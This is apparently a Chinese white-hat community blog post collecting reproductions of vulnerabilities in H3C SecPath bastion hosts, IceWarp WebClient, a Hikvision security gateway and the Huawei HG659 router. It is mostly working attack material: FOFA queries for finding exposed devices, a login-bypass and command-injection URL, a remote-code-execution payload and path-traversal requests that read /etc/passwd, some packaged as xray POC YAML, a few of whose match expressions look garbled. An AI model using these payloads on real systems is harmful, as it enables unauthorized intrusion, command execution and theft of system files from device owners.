漏洞复现合集
作者:huluwa 编辑:白帽子社区运营团队
"白帽子社区在线CTF靶场BMZCTF,欢迎各位在这里练习、学习,BMZCTF全身心为网络安全赛手提供优质学习环境,链接(http://www.bmzclub.cn/)
"
H3C SecParh堡垒机data_provider.php 页面存在远程命令执行漏洞,攻击者可通过构造恶意语句进行命令执行。
FOFA查询语法:
app="H3C-SecPath-运维审计系统" && body="2018"
先通过任意用户登录获取Cookie
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
再进行命令执行
/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(id)&identity_cond=&query_type=all&format=json&browse=true
FOFA查询语法:
app="IceWarp-公司产品"
name: poc-yaml-icewarp-webclient-rce
rules:
- method: POST
headers:
Content-Type: application/x-www-form-urlencoded
path: /webmail/basic/
body: _dlg[captcha][target]=system(\'ipconfig\')\
expression: |
response.status == 200 && response.body.bcontains(b"Windows IP Configuration")
author: huluwa
links:
- http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/IceWarp%20WebClient%20basic/IceWarp%20WebClient%20basic%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
海康威视安全网关存在任意文件下载漏洞。该漏洞是由于webui下file_name参数未对传入参数过滤不当所致,攻击者可利用漏洞进行任意文件下载。
FOFA查询语法:
app="HIKVISION-安全网关"
POC:
/webui/?g=sys_dia_data_down&file_name=../etc/passwd
HUAWEI HG659
FOFA查询语法:
app="HUAWEI-Home-Gateway-HG659"
POC:
http://ip:port/lib///....//....//....//....//....//....//....//....//etc//passwd
http://ip:port/js///....//....//....//....//....//....//....//....//etc//passwd
http://ip:port/css///....//....//....//....//....//....//....//....//etc//passwd
http://ip:port/res///....//....//....//....//....//....//....//....//etc//passwd
附xray检测脚本:
name: poc-yaml-huawei-home-gateway-hg659-fileread
groups:
poc1:
method: GET
path: /lib///....//....//....//....//....//....//....//....//etc//passwd
expression: |
= 200 && "root:[x*]:0:0:".bmatches(response.body) =
poc2:
method: GET
path: /js///....//....//....//....//....//....//....//....//etc//passwd
expression: |
= 200 && "root:[x*]:0:0:".bmatches(response.body) =
poc3:
method: GET
path: /res///....//....//....//....//....//....//....//....//etc//passwd
expression: |
= 200 && "root:[x*]:0:0:".bmatches(response.body) =
poc4:
method: GET
path: /css///....//....//....//....//....//....//....//....//etc//passwd
expression: |
= 200 && "root:[x*]:0:0:".bmatches(response.body) =
detail:
author: huluwa
links:
https://mp.weixin.qq.com/s/SQGnMXYJADEqTZpRE69vHg
评论